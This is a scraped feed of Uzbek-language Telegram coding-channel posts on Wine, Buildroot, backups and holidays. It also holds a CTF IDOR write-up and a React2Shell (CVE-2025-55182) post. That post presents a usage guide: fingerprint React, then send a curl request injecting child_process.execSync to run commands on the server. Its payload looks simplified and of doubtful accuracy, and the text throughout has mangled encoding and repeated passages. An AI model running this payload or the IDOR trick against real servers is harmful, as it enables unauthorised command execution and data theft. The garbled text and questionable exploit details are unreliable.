This media is not supported in your browser
VIEW IN TELEGRAM
1๐ฅ3โค1
Please open Telegram to view this post
VIEW IN TELEGRAM
โค5
Wine โ Linuxda .exe dasturlarni ishga tushirish imkonini beruvchi kutubxona. U Windows tizimini toโliq oโrnatmasdan turib koโplab dastur va oโyinlarni ochishga yordam beradi
Afzalliklari:
โข Yengil va tez ishlaydi
โข Virtual mashina talab qilmaydi
โข Koโplab dasturlar bilan mos
Oโrnatish:
Ishga tushirish:
@uzcodingblog
Afzalliklari:
โข Yengil va tez ishlaydi
โข Virtual mashina talab qilmaydi
โข Koโplab dasturlar bilan mos
Oโrnatish:
sudo apt update
sudo apt install wine
Ishga tushirish:
wine dastur.exe
@uzcodingblog
๐ฅ4
#metroda
@uzcodingblog
Buildroot โ bu oโrnatiladigan qurilmalar (embedded systems) uchun minimal Linux tizimini yigโishga moโljallangan build tizim. Odatda monitorlar, routerlar, sanoat panellari va transport displeylarida ishlatiladi, yaโni bu oddiy kompyuter emas โ maxsus qurilma ichida ishlaydigan kichik Linux tizimi
@uzcodingblog
Missiya: Tizim arxitekturasidagi mantiqiy zaiflikni ekspluatatsiya qilib, Boshqaruvchi profilidagi CTF{...} maxfiy kodini qo'lga kiritish Ro'yxatdan o'tganingizda tizim sizga avtomatik ravishda eng pas yani oxirgi darajani beradi siz esa TASHKILOT BOSHLIG'I malumotlariga kirishingiz kerak
#CyberLab
Please open Telegram to view this post
VIEW IN TELEGRAM
๐ข๐๐ผ๐ฑ๐ฏ๐ฒ๐ธ๐๐ฒ๐
https://t.me/uzcodingblog/556?comment=5752
ZAIFLIK TOPILDI
ZAIFLIK TOPILDI
Qanday ishladi?
Ro'yxatdan o'tganingizda URL manzilda ?id=101 kabi o'zingizning raqamingiz chiqdi. Siz raqamni shunchaki 1 ga o'zgartirdingiz va to'g'ridan-to'g'ri Admin profiliga kirib bordingiz.
Xato qayerda?
Sayt ma'lumot chiqarishdan oldin foydalanuvchini umuman tekshirmagan. Ya'ni, "Bu ma'lumotni so'rayotgan odam rostdan ham shu profil egasimi?" degan mantiqiy tekshiruv kodda yo'q edi. Server shunchaki ko'r-ko'rona ishonib, adminning sirini hammaga ochib berdi.
Yurtimizning muhtaram va aziz ayollari!
Sizlarni 8 mart โ Xalqaro xotin-qizlar bayrami bilan tabriklayman
Mamlakatimiz taraqqiyoti, jamiyat ravnaqi va kelajak avlodni tarbiyalashda xotin-qizlarning oโrni beqiyosdir. Sizlar oโzingizning fidokorona mehnatingiz, yuksak masโuliyatingiz va mehr-oqibatingiz bilan har bir sohada munosib hissa qoโshib kelmoqdasiz.
Shu fayzli bahor ayyomida sizlarga mustahkam sogโliq, oilaviy baxt-saodat, xonadonlaringizga tinchlik-xotirjamlik, masโuliyatli faoliyatingizda ulkan yutuqlar tilayman!
@ozodbekdevv
Please open Telegram to view this post
VIEW IN TELEGRAM
โคโ๐ฅ4โค2๐1
Forwarded from UzCERT Live
#Google #Chrome #Windows #macOS #Linux #zaiflik
Please open Telegram to view this post
VIEW IN TELEGRAM
React2Shell (CVE-2025-55182)
- CVE: CVE-2025-55182
- Nom: React2Shell
- Turi: Remote Code Execution (RCE)
- Taสผsir qiluvchi texnologiyalar: React Server Components, Next.js App Router
- CVSS bahosi: 9.8 โ 10.0 (Critical)
Yaqinda React va Next.js ekotizimida juda xavfli zaiflik aniqlangan. Bu zaiflik React Server Components (RSC) ishlatiladigan serverlarda masofadan turib buyruq bajarishga (Remote Code Execution) imkon beradi.
Muammo RSC โFlight protocolโ maสผlumotlarini notoสปgสปri qayta ishlash bilan bogสปliq. Maxsus tayyorlangan payload orqali hujumchi server tomonda Node.js modullarini chaqirishi va OS buyruqlarini bajarishi mumkin. Shuningdek 15million aholi malumotlari aynan shu zaiflik asosida olingan
- CVE: CVE-2025-55182
- Nom: React2Shell
- Turi: Remote Code Execution (RCE)
- Taสผsir qiluvchi texnologiyalar: React Server Components, Next.js App Router
- CVSS bahosi: 9.8 โ 10.0 (Critical)
@uzcodingblog
Foydalanish:
Ushbu zaiflikdan faqat React oสปrnatilgan serverlarda foydalanishimiz mumkin shu sabab serverda React mavjudligini tekshiramiz bu uchun esa Wappoalyzer dan foydalanamiz :
Foydalanilgan texnologiyalar orasida React mavjud boสปlsa bu serverda React2Shell zaifligi boสปlishi mumkin. Zaiflikdan foydalanib Server da amal bajarish uchun:
Bu orqali server terminalida whois buyrugสปini berdik va javob ubuntu tarzida chiqadi
Ushbu zaiflikdan faqat React oสปrnatilgan serverlarda foydalanishimiz mumkin shu sabab serverda React mavjudligini tekshiramiz bu uchun esa Wappoalyzer dan foydalanamiz :
npm install -g wappalyzer
wappalyzer https://example.com
Foydalanilgan texnologiyalar orasida React mavjud boสปlsa bu serverda React2Shell zaifligi boสปlishi mumkin. Zaiflikdan foydalanib Server da amal bajarish uchun:
curl -s -X POST http://example.com:4000/api/rsc/render \
-H "Content-Type: application/json" \
-d '{"flight":"0:require(\"child_process\").execSync(\"whoami\").toString()"}'
Bu orqali server terminalida whois buyrugสปini berdik va javob ubuntu tarzida chiqadi
@uzcodingblog
This media is not supported in your browser
VIEW IN TELEGRAM
โค4
๐ข๐๐ผ๐ฑ๐ฏ๐ฒ๐ธ๐๐ฒ๐
Video message
ESP8266 (ESP-12F)
This media is not supported in the widget
VIEW IN TELEGRAM
๐ฅ4
Backup nima va nima uchun muhim?
@uzcodingblog
Dasturchi sifatida eng katta xatolardan biri โ maโlumotlarga haddan tashqari ishonib qoโyish. Hammasi joyida ishlayotgandek tuyuladi, lekin bitta xatolik, serverdagi nosozlik yoki oddiygina notoโgโri oโchirish butun loyihani yoโqqa chiqarishi mumkin. Backup aynan shunday vaziyatlar uchun kerak. Bu โ maโlumotlarning zaxira nusxasi boโlib, kerak boโlganda tizimni oldingi holatiga qaytarish imkonini beradi. Ayniqsa production tizimlarda backup yoโqligi katta xavf hisoblanadi. Koโpincha muammo yuz bergandan keyin backup haqida oโylay boshlashadi. Aslida esa bu oldindan yoโlga qoโyilishi kerak boโlgan jarayon. Oddiy qilib aytganda, backup โ bu sizning โplan Bโingiz. Yaxshi yondashuv esa juda murakkab emas: muntazam backup olish, uni bir nechta joyda saqlash va vaqti-vaqti bilan tiklab koโrish. Shunda siz kutilmagan holatlarda ham xotirjam ishlay olasiz
Backup qilinmagan loyiha โ bu har doim xavf ostidagi loyiha.
@uzcodingblog
๐Ramazon Hayiti muborak boโlsin!